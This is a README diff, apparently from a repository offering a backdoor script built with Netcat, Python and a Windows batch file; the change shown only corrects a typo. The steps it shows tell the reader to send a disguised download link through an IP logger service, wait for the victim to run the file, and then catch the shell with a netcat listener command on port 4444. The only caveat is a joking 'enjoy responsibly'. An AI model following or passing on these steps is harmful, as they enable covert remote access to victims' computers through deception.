ArnabMandal457/PETV83L-Arnab-Mandal-Backdoor-script-using-Netcat-Python-and-Windows-bat-file/README.md

 2. Send the masked download link using a shortened IP logger service.
 3. Wait for the target to run the file.
 4. Connect to the shell:
-   - This is the command that triggers the backdoor in our Window machine (Runs automatically on runngin the python file).
+   - This is the command that triggers the backdoor in our Window machine (Runs automatically on running the python file).
    ```bash
    nc64 -lvp 4444
 6. Enjoy responsibly (or face karmic doom).